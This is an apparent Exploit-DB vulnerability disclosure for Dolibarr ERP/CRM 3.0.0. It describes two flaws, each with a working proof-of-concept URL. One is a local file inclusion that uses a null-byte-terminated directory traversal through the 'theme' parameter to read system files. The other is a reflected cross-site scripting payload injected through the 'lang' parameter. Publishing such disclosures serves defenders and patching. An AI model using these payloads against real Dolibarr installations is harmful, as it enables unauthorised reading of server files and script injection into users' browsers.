[] NeoSense

Dolibarr ERP/CRM 3.0.0 - Multiple Vulnerabilities

Author: AutoSec Tools
type: webapps
platform: php
port: 
date_added: 2011-04-22 
date_updated: 2017-10-07 
verified: 0 
codes: OSVDB-72129;OSVDB-72128 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comdolibarr-3.0.0.tgz

------------------------------------------------------------------------
Software................Dolibarr 3.0.0
Vulnerability...........Local File Inclusion
Threat Level............Critical (4/5)
Download................http://www.dolibarr.org/
Discovery Date..........4/21/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------


--Description--

A local file inclusion vulnerability in Dolibarr 3.0.0 can be
exploited to include arbitrary files.


--PoC--

http://localhost/dolibarr-3.0.0/htdocs/user/passwordforgotten.php?theme=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00

------------------------------------------------------------------------
Software................Dolibarr 3.0.0
Vulnerability...........Reflected Cross-site Scripting
Threat Level............Low (1/5)
Download................http://www.dolibarr.org/
Discovery Date..........4/21/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------


--Description--

A reflected cross-site scripting vulnerability in Dolibarr 3.0.0 can
be exploited to execute arbitrary JavaScript.


--PoC--

http://localhost/dolibarr-3.0.0/htdocs/document.php?lang=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E